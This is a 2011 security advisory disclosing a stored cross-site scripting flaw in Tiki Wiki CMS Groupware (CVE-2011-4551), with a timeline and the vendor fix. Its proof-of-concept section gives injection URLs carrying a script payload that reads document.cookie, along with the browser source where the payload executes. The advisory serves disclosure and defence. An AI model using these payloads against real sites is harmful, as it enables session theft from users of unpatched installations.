Warning: opendir(/var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/sh/3.0.83.2/scripts/): failed to open dir: No such file or directory in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 26

Warning: Invalid argument supplied for foreach() in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 170
Skip to content

INFOSERVE-ADV2011-07 - Tiki Wiki CMS Groupware stored Cross-Site-Scripting

Posted by Stefan Schurtz on
Advisory:
Tiki Wiki CMS Groupware Stored Cross-Site-Scripting
Advisory ID:
INFOSERVE-ADV2011-07
Author:
Stefan Schurtz
Contact:
Affected Software:
Successfully tested on Tiki 8.1 & 6.4 LTS (affects all current releases)
Vendor URL:
Vendor Status:
fixed
CVE-ID:
CVE-2011-4551
 
======================
Vulnerability Description
======================

All current releases of Tiki Wiki are prone to a stored XSS vulnerability
 
==============
PoC-Exploit
==============

Tested with Firefox 7.01

"Visit" this URL
 
http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss=</style></script><script>alert(document.cookie)</script> -> blank site
 
But when you visit one of this pages, the XSS will be executed

http://<target>/tiki-8.1/tiki-login.php
http://<target>/tiki-8.1/tiki-remind_password.php

// browser source code

show_errors: ‘y’,
        xss: ‘</style></script><script>alert(document.cookie)</script>’
};

Another example:

http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss1=</style></script><script>alert(document.cookie)</script>
http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss2=</style></script><script>alert(document.cookie)</script>
http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss3=</style></script><script>alert(document.cookie)</script>

All of them will be executed!

// browser source code

show_errors: ‘y’,
    xss1: ‘</style></script><script>alert(document.cookie)</script>’,
    xss2: ‘</style></script><script>alert(document.cookie)</script>’,
    xss3: ‘</style></script><script>alert(document.cookie)</script>’
};

=====
Solution
=====

Upgrade to Tiki 8.2 or 6.5 LTS

================
Disclosure Timeline
================

16-Nov-2011 – informed Security Team (security@tikiwiki.org)
19-Dec-2011 – fixed by vendor

====
Credits
====

Vulnerabilitiy found and advisory written by the INFOSERVE security team.

=======
References
=======

http://info.tiki.org/article183-Tiki-Wiki-CMS-Groupware-8-2-and-6-5LTS-Security-Patches-Available
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-07.txt

Trackbacks

No Trackbacks

Comments

Display comments as Linear | Threaded

No comments

Add Comment


To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA 1CAPTCHA 2CAPTCHA 3CAPTCHA 4CAPTCHA 5


Textile-formatting allowed
You can use [geshi lang=lang_name [,ln={y|n}]][/geshi] tags to embed source code snippets.
Form options
Imprint | Contact | Privacy Statement

Warning: opendir(/var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/sh/3.0.83.2/scripts/): failed to open dir: No such file or directory in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 26

Warning: Invalid argument supplied for foreach() in /var/www/html/web1/serendipity/plugins/serendipity_event_dpsyntaxhighlighter/serendipity_event_dpsyntaxhighlighter.php on line 170